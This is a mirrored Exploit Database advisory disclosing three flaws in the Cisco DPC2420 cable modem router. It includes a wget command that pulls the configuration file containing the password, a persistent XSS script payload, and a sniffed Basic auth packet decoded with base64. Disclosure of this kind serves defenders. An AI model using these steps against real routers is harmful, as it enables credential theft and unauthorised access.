Cisco DPC2420 – Multiples Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Facundo M. de la Cruz
  日期： 2012-12-09
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/23250/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  ##
  ## ->Title: DPC2420 Multiple vulnerabilities
  ## -> Author: Facundo M. de la Cruz (tty0)
  ## -> E-mail: fmdlc@code4life.com.ar
  ##=20
  
  [0x00]> Details
  
   Vendor: Cisco
   Model : DPC2420
   type: Cablemodem router.=20
   Firmware: D2425-P10-13-v202r12811-110511as-TRO.bin
   Software: D2425-P10-13-v202r12811-110511as-TRO
   Website : http://www.cisco.com/web/consumer/support/modem_DPC2420.html
  
  [0x01]> Configuration file disclosure
  
  Some ISP's (like the Argentinean Telecentro) could make some changes in the=
   router configration via the=20
  TCP 8080 port.
  
  If the remote config option is enabled and the port is not filter, an attac=
  ker can download this file=20
  calling the correct URL. For example:
  
  
  $ wget http://foobar:8080/filename.gwc -O filename.gwc=20
  - --2012-12-08 21:24:43--http://foobar:8080/filename.gwc
  Connecting to foobar:8080... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: unspecified [application/octet-stream Content-transfer-encoding: bi=
  nary]
  Saving to: =E2=80=9Cfilename.gwc=E2=80=9D
  
  [<=>] 15,=
  92750.9K/s in 0.3s =20
  
  2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=
  27]
  
  $ head -n 10 filename.gwc=20
  CRCVALUE=4144540802;
  #<<Begin of Configuration File>>
  Version=1.1;
  Created Date=2012/12/8;
  Created Time=21:24:43;
  Model Number=DPC2420;
  Serial Number=234905123;
  User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
  l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR
  7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=
  Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK
  WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=
  ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6
  3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==;
  [---OUTPUT OMITTED FOR SPACE REASONS---]
  
  [0x02]> - Persistent XSS
  
  With a valid user in the router web interface for managment and configurati=
  on, a user could insert JavaScript
  code in this forms and make a XSS, for example add a parental rule called "=
  '/><script>alert(1)</script>.
  
  http://192.168.0.1/RgParentalBasic.asp
  
  - -> Attachments: http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png
  
  [0x03]> Authtype Basic=20
  
  An attacker making an ARP poisoning attack could get the router loggin cred=
  entials due the web interface=20
  authentication type is auth-basic.=20
  Then the attacker could get the Base64 encoded password and convert it to p=
  lain text easily.=20
  
  20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0=
  :372, ack 1, win 115
  
  0x0000:4500 01a8 fdf4 4000 4006 ccaf ac10 01f2E.....@.@.......
  0x0010:c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e.......P....v...
  0x0020:8018 0073 03c2 0000 0101 080a 055f ee19...s........._..
  0x0030:0000 be7e 4745 5420 2f73 6967 6e61 6c2e...~GET./signal.
  0x0040:6173 7020 4854 5450 2f31 2e31 0d0a 486fasp.HTTP/1.1..Ho
  0x0050:7374 3a20 3139 322e 3136 382e 302e 310dst:.192.168.0.1.
  0x0060:0a55 7365 722d 4167 656e 743a 204d 6f7a.User-Agent:.Moz
  0x0070:696c 6c61 2f35 2e30 2028 5831 313b 204cilla/5.0.(X11;.L
  0x0080:696e 7578 2078 3836 5f36 343b 2072 763ainux.x86_64;.rv:
  0x0090:3136 2e30 2920 4765 636b 6f2f 3230 313016.0).Gecko/2010
  0x00a0:3031 3031 2046 6972 6566 6f78 2f31 362e0101.Firefox/16.
  0x00b0:300d 0a41 6363 6570 743a 2074 6578 742f0..Accept:.text/
  0x00c0:6874 6d6c 2c61 7070 6c69 6361 7469 6f6ehtml,application
  0x00d0:2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69/xhtml+xml,appli
  0x00e0:6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39cation/xml;q=0.=
  9
  0x00f0:2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365,*/*;q=0.8..Acc=
  e
  0x0100:7074 2d4c 616e 6775 6167 653a 2065 6e2dpt-Language:.en-
  0x0110:5553 2c65 6e3b 713d 302e 350d 0a41 6363US,en;q=0.5..Ac=
  c
  0x0120:6570 742d 456e 636f 6469 6e67 3a20 677aept-Encoding:.gz
  0x0130:6970 2c20 6465 666c 6174 650d 0a43 6f6eip,.deflate..Con
  0x0140:6e65 6374 696f 6e3a 206b 6565 702d 616cnection:.keep-al
  0x0150:6976 650d 0a52 6566 6572 6572 3a20 6874ive..Referer:.ht
  0x0160:7470 3a2f 2f31 3932 2e31 3638 2e30 2e31tp://192.168.0.1
  0x0170:2f77 6562 7374 6172 2e68 746d 6c0d 0a41/webstar.html..A
  0x0180:7574 686f 7269 7a61 7469 6f6e 3a20 4261uthorization:.Ba
  0x0190:7369 6320 4f6b 4d30 626d fa38 3443 a9c0sic.aWFtYXBhc3N3
  0x01a0:1b4e 1134 640a 054bZAo==....
  
  - From 0x0180 offset to the end of the packet payload the attacker could ge=
  t the password=20
  encoded with Base64 and simply convert it to plain text:
  
  $ echo aWFtYXBhc3N3ZAo== | base64 -d
  iamapassword
  
  - ---
  1355011796
  
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v1.4.12 (GNU/Linux)
  
  iQIcBAEBAgAGBQJQxAalAAoJENeXyOFXJgeJY5cP/2/1n/KGlXcyGLPbbzOa2517
  EW4UXl4apvKWWOfRfem7+zA/Y4Epxw2l3153Dbp52u2FWPSHzzI3ETK3zY8EYGjL
  JkBixPSURV8wPwl33XlM/i0dYbtgVspYEgbtFF/ox1mHe4yPapageu3W0rQvf1fX
  IcmS7gS7os65ch9nLH5CpqJBcpxw+n131iI8g5yJ8rmGmkjre8cIwsvG4tNfyZGo
  X96pgTzjYnLQww1UoGSkhhKEAudCwb6gqsuGNSbal/Sg1KXj3vmqeZlxWrDEGcuV
  fbyGYrn5/+mlayzZLChPSoZrET6qKr78PEPGz5sp0d4mRVz6txr0tpnmmY7aIKL0
  HlwhlN6nCbzmuq1RrBL+1FHMAP0Xi7JN6WH5AuDW75r5QO8CyYxIm8TlqXMScJYH
  bhX2CmfqkYpKsx3bbxDlqn5cCLUUdEm7UM/TuLcvzzAiyamBQgsrNCI6TOXClFRB
  zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9
  s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq
  X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G
  E7C4vqJfmBNShPTbtb67
  =Ezto
  -----END PGP SIGNATURE-----